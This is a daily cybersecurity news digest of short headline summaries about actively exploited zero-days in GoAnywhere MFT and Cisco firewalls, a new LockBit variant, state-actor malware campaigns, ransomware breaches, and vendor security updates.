Today’s intelligence digest is dominated by actively exploited zero-day vulnerabilities in enterprise-grade software. A critical CVSS 10.0 flaw in Fortra’s GoAnywhere MFT is being exploited in the wild, alongside separate zero-days in Cisco firewalls used by the ArcaneDoor APT. We are also tracking a new, more dangerous variant of the LockBit ransomware and a campaign by Iranian state actors using valid SSL certificates to sign malware.
Top 5 Critical Security Alerts
- Maximum severity GoAnywhere MFT flaw exploited as zero-day: A critical CVSS 10.0 vulnerability in Fortra’s GoAnywhere MFT is being actively exploited as a zero-day, with evidence suggesting exploitation began a week before public disclosure. Read more
- Cisco ASA Firewall Zero-Day Exploits Deploy New Malware: The ArcaneDoor threat actor is exploiting zero-day vulnerabilities in Cisco firewalls to deploy new malware strains, RayInitiator and LINE VIPER, prompting urgent patch advisories from US and UK agencies. Read more
- New LockBit Ransomware Variant Emerges as Most Dangerous Yet: A new version of the LockBit ransomware has been identified with significant technical improvements and cross-platform capabilities, targeting Windows, Linux, and VMware ESXi systems. Read more
- Iranian State Hackers Use SSL.com Certificates to Sign Malware: Multiple Iranian state-sponsored threat groups, including Charming Kitten, are using valid code-signing certificates from SSL.com to sign and distribute malware, bypassing security controls. Read more
- Ransomware attack on Ohio county impacts over 45,000 residents: A ransomware attack on an Ohio county has resulted in a significant data breach, exposing the names, Social Security numbers, and financial information of over 45,000 people. Read more
Threat Intelligence
- New COLDRIVER Malware Campaign Targets Russia-Focused Entities: The Russian APT group COLDRIVER is using new malware families, BAITSWITCH and SIMPLEFIX, in a multi-stage campaign against Russia-focused targets. Read more
- New macOS XCSSET Variant Targets Firefox with Clipper and Persistence Module: An updated version of the XCSSET macOS malware has been discovered with enhanced capabilities for browser targeting, clipboard hijacking, and establishing persistence. Read more
- HeartCrypt Packer-as-a-Service Operation Expands Impersonation Efforts: Security researchers have detailed the evolution of the HeartCrypt Packer-as-a-Service, a notorious operation used by threat actors to obfuscate malware. Read more
- Phishing Campaign Uses Malicious SVG Files to Target Ukraine and Vietnam: A phishing campaign impersonating Ukrainian government agencies is using malicious SVG files to deliver CountLoader, which in turn drops Amatera Stealer and PureMiner malware. Read more
- Teens Arrested in Netherlands on Suspicion of Spying for Russia: Two teenagers have been arrested by Dutch police, reportedly suspected of conducting cyber-espionage activities on behalf of pro-Russian hacking groups. Read more
Security Breaches & Incidents
- Volvo Employee SSNs Stolen in Supplier Ransomware Attack: Volvo North America has confirmed that employee Social Security Numbers were stolen as part of a ransomware attack targeting one of its IT suppliers. Read more
- Thousands of Indian bank transfer records found spilling online after security lapse: A configuration error at Indian fintech company NuPay exposed thousands of sensitive bank transfer records online, which have since been secured. Read more
Security Tools & Best Practices
- Microsoft Edge to block malicious sideloaded extensions: Microsoft is introducing a new security feature in its Edge browser designed to protect users by blocking potentially malicious extensions that are sideloaded. Read more
- Microsoft shares temp fix for Outlook encrypted email errors: Microsoft is investigating an issue causing errors when opening encrypted emails from external organizations in Outlook and has provided a temporary workaround. Read more
- TruSources to showcase on-device identity-checking technology: A startup named TruSources is developing privacy-focused technology that performs age and identity verification directly on a user’s device without uploading IDs. Read more
Emerging Security Technologies
- The hidden cyber risks of deploying generative AI: Deploying generative AI without proper safeguards can introduce significant security risks, including new avenues for phishing, fraud, and model manipulation. Read more
- US investigators are using AI to detect child abuse images made by AI: The Department of Homeland Security is experimenting with AI tools to differentiate between AI-generated child abuse material and images depicting real victims. Read more
